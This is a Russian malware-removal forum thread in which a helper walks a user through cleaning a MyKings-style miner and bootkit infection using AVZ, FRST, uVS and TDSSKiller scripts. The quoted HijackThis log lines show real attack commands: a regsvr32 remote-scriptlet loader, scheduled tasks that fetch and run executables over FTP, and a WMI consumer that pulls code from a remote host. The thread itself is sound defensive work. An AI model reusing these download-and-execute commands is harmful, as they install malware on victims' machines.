Нужна помощь с lsmosee.exe , mysa1,2,3 и ok.

**BigBy** · 06.12.2018, 17:23

Здравствуйте. Помогите пожалуйста с следующей проблемой:

В планировщике задач появились такие задачи как mysa1,2,3 и ok.
Иногда при включении компьютера отключается антивирус (Avast). Включается только при перезагрузке и принудительном включении Службы удаленных рабочих столов. Если антивирус остается включенным, он удаляет c /windows/debug/item.dat и блокирует доступ к адресу 66.117.2.182
Часто при включении компьютера он начинает сильно тормозить/намертво зависать. Иногда это лечится простым открытием диспетчера задач.

Файлик с логами прилагаю. Прошу вашей помощи.

Спасибо.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 06.12.2018, 17:24

Уважаемый(ая) BigBy, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 06.12.2018, 21:31

Систему надо обновлять, нечисть лезет через закрытую ещё в апреле прошлого года уязвимость.

Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки :

Код:

O4 - HKCU\..\Policies\Explorer\Run: [Policies] = c:\dir\install\install\111111111.exe  (file missing)
O4 - HKLM\..\Policies\Explorer\Run: [Policies] = c:\dir\install\install\111111111.exe  (file missing)
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2018/12/06) - {77a5c2a1-62ee-48ca-9253-39e30c0d8bec} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/06) - {77a5c2a1-62ee-48ca-9253-39e30c0d8bec} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/06) - {77a5c2a1-62ee-48ca-9253-39e30c0d8bec} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/06) - {77a5c2a1-62ee-48ca-9253-39e30c0d8bec} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/12/06) - {77a5c2a1-62ee-48ca-9253-39e30c0d8bec} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: (disabled) Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: (disabled) Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: (disabled) Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes)

Выполните скрипт в AVZ:

Код:

begin
 QuarantineFile('a.exe', '');
 QuarantineFile('c:\dir\install\install\111111111.exe', '');
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('C:\Windows\help\lsmosee.exe', '');
 DeleteFile('a.exe', '');
 DeleteFile('c:\dir\install\install\111111111.exe', '32');
 DeleteFile('c:\windows\debug\item.dat', '');
 DeleteFile('C:\Windows\help\lsmosee.exe', '');
 ExecuteFile('schtasks.exe', '/delete /TN "{0214FF5B-BC9A-437D-A956-712F666B1CFC}" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true);
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run', 'Policies');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.

Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Уведомление

Установите хотфикс KB4012212

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

**BigBy** · 08.12.2018, 10:56

Я прошу пардона, вчера отправил сообщения в тему с прикрепленными отчетами, но они не отображаются. Так и должно быть?
UPD: продублировал сообщение еще раз. Прикрепил файлы с отчетами

Вот этой строки у меня не было в Hijack

PHP код:


O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes)

Все рекомендации выполнил, но проблема осталась.

**Vvvyg** · 08.12.2018, 12:23

Попало на премодерацию.

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

CreateRestorePoint:
HKU\S-1-5-21-834076564-961232728-2763486299-1000\...\Run: [] => [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
2018-12-06 06:11 - 2018-12-06 06:11 - 000000000 _____ C:\Windows\system32\Tmp64CB.tmp
2018-12-05 20:38 - 2018-12-05 20:38 - 000000000 _____ C:\Windows\system32\Tmp7A6C.tmp
2018-12-05 20:38 - 2018-12-05 20:38 - 000000000 _____ C:\Windows\system32\Tmp78A8.tmp
2018-12-01 11:45 - 2018-12-01 11:45 - 000002380 _____ C:\Windows\system32\nvidia.txt
2018-12-01 09:44 - 2018-12-07 06:14 - 000000406 _____ C:\Windows\config.txt
2018-12-01 09:44 - 2018-12-07 06:14 - 000000336 _____ C:\Windows\pools.txt
2018-12-01 09:44 - 2018-12-07 06:14 - 000000084 _____ C:\Program Files\Common Files\xp.dat
2018-12-01 09:44 - 2018-12-01 09:44 - 000002681 _____ C:\Windows\cpu.txt
Virustotal: C:\Users\Maloy\AppData\Roaming\WindowsUpdate.VIR000
2005-04-08 08:16 - 2017-03-25 18:23 - 000011047 ____H () C:\Users\Maloy\AppData\Roaming\logs.dat
2017-03-25 20:26 - 2017-05-21 11:43 - 000000004 _____ () C:\Users\Maloy\AppData\Roaming\pid.txt
2017-03-25 20:26 - 2017-05-21 11:43 - 000000048 _____ () C:\Users\Maloy\AppData\Roaming\pidloc.txt
c:\windows\debug\ok.dat
Task: {293B964B-0D85-4BE1-9BC9-5D2CD3427C37} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer: <==== ATTENTION
FirewallRules: [{13A5F36E-0C34-4464-A8E2-2E0E956B94AD}] => (Block) LPort=445
FirewallRules: [{11AB2E9F-D30F-4E51-A48D-73267B99BC71}] => (Block) LPort=139
Reboot:

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры,
Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

Приложите этот файл к своему следующему сообщению.

**BigBy** · 08.12.2018, 12:43

Здравствуйте. Рекомендации выполнил, файлы в приложении.

**Vvvyg** · 08.12.2018, 13:04

Учетная запись гостя включена. Пароль не установлен.

Рекомендую отключить учётку.

Удалите все установленные версии Java, они устаревшие и со множеством критических уязвимостей.
Если Java вообще нужна для каких- либо приложений, игр (и Вы точно знаете, для каких именно) - установите текущий билд Java 8.
Учтите, что 64-bit версия Java нужна только для очень ограниченного круга приложений.

Обновите Mozilla Firefox, Mozilla Thunderbird и Opera до актуальных версий.
Если обновление KB4012212 установилось нормально, проблема повторяться не должна.

Примените такой fixlist.txt в FRST:

Код:

C:\Users\Maloy\AppData\Roaming\WindowsUpdate.VIR000

**BigBy** · 08.12.2018, 13:50

Рекомендации выполнил (Обновил оперу/мозиллу, удалил JAVA). Обновление KB4012212 встало хорошо, по крайней мере не было никаких уведомлений об ошибках
К сожалению в планировщике задач Mysa, Mysa2, Mysa3 все еще висят.
Антивирус умирает после перезагрузки вот с таким окном
Вложение 675427
Ошибка с авирем гуглится, есть несколько способов эту ошибку убрать, но ни один не помогает.

UPD: Еще раз прошелся HiJackThis, все строки что я фиксил снова были там. Я их пофиксил и перезагрузил компьютер - вроде пока полет нормальный. Антивирус работает, из планировщика задач пропали Mysa, Mysa2, Mysa3. Но я не понимаю почему снова пришлось фиксить строки, которые я сутки назад уже фиксил (я проверял тогда, их не было)

**Vvvyg** · 08.12.2018, 16:41

Видимо, пролезло снова до установки обновления.

Полностью переустановить антивирус пробовали? Удалить, дочистить утилитой aswclear.exe в безопасном режиме и установить с нуля?

**BigBy** · 08.12.2018, 19:57

Дело в том, что Аваст у меня стоит от силы неделю-две. До этого была авира, с ней была та же беда. Никаких ошибок, она просто не открывалась, а если вылезали всплывающие окна - они не закрывались. Авиру я сносил из безопасного и ставил заново, но не помогало. Попробую по вашей рекомендации удалить и почистить из безопасного, спасибо.
Вы считаете что в принципе более вирус не покажет себя и это был единичный случай? Потому что я и вправду сначала провел скрипт и фикс, а только после этого установил обновление. И соответственно между этими действиями была перезагрузка

UPD:Все еще стучится вот такой малварь:
Вложение 675435

**Vvvyg** · 08.12.2018, 20:52

Остальные обновления системы точно установлены?

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.

**BigBy** · 09.12.2018, 08:03

Обновления все установлены, остались только языковые пакеты:
Вложение 675439
Лог с UVS прилагаю

**Vvvyg** · 09.12.2018, 12:32

Да, пытается майнер скачать.

Скопируйте скрипт из окна "код" ниже в буфер обмена:

Код:

;uVS v4.1.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
zoo %Sys32%\DRIVERS\NETFILTER_V76.SYS
addsgn BA6F9BB219E18E3E801D46249B37ED4CAE5AB57D40B29CBCAD2A83BEAE29BD80A305C1573E559D492B80849FD0014BFAD50EE8727DCBB22C2D77A42FC7062273 64 FileRepMetagen [PUP] [Avast] 7
chklst
delvir
delref %SystemDrive%\PROGRAM FILES (X86)\BITCOMET\BITCOMET.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\BITCOMET\BITCOMET.URL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\58.0.3029.81\INSTALLER\CHRMSTP.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\FLASHGET NETWORK\FLASHGET 3\IEHELPER.DLL
deltsk %SystemRoot%\TEMP\13BF7A3E-9F47-4307-AE97-4811DFB701AB
deltsk %SystemDrive%\USERS\MALOY\DESKTOP\LAUNCHER101XP_SETUP.EXE
delwmi KERNCAP.VBS
delwmi WMI:\\.\ROOT\SUBSCRIPTION\NTEVENTLOGEVENTCONSUMER\SCM EVENT LOG CONSUMER.[SCM EVENT LOG FILTER]
apply
deltmp
czoo
restart

Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Компьютер перезагрузится.

В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

Скачайте и запустите TDSSKiller: http://support.kaspersky.ru/viruses/disinfection/5350.
Файл C:\TDSSKiller.***_log.txt упакуйте в архив приложите в теме.
(где *** - версия программы, дата и время запуска.)

**BigBy** · 09.12.2018, 16:47

Комп уходит в BSOD через 2 минуты после включения, после выполнения предыдущих рекомендаций
Не успеваю приложить отчет
В безопасном режиме BSOD не наблюдается

- - - - -Добавлено - - - - -

Спасибо за вашу помощь, но я не выдержал и снес винду. Сейчас ставлю 10, буду посмотреть как она.

**Vvvyg** · 09.12.2018, 17:35

Зря, TDSSKiller как раз буткит вылечил, должно быть всё хорошо теперь.

17:51:45.0923 0x0be0 Detected object count: 2
17:51:45.0923 0x0be0 Actual detected object count: 2
17:52:03.0863 0x0be0 System memory - cured
17:52:03.0863 0x0be0 System memory ( MEM:Rootkit.Win64.DarkGalaxy.a ) - User select action: Cure
17:52:04.0044 0x0be0 \Device\Harddisk2\DR2\# - copied to quarantine
17:52:04.0044 0x0be0 \Device\Harddisk2\DR2 - copied to quarantine
17:52:04.0044 0x0be0 \Device\Harddisk2\DR2 ( Rootkit.Boot.DarkGalaxy.a ) - will be cured on reboot
17:52:04.0044 0x0be0 \Device\Harddisk2\DR2 - ok
17:52:04.0044 0x0be0 \Device\Harddisk2\DR2 ( Rootkit.Boot.DarkGalaxy.a ) - User select action: Cure

А если не справился, то и переустановка системы не поможет. Проверьте им снова.

**BigBy** · 10.12.2018, 04:04

Здравствуйте, может быть и вылечил, но как я и говорил - после загрузки системы, через минуту или две она уходила в BSOD. Я только с безопасного мог загрузиться. Так что ничего хорошо не было, работать за компом было невозможно, равно как и сделать что нибудь =)
А сейчас стоит 10ка и вроде пока все хорошо.

**Vvvyg** · 10.12.2018, 06:51

Сделайте проверку TDSSKiller для контроля.

**BigBy** · 10.12.2018, 19:01

Прилагаю отчет

**Vvvyg** · 10.12.2018, 20:48

Всё чисто.

Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

Приложите этот файл к своему следующему сообщению.

**BigBy** · 11.12.2018, 03:30

Здравствуйте. Отчет прилагаю

Нужна помощь с lsmosee.exe , mysa1,2,3 и ok. (заявка № 221066)

Опции темы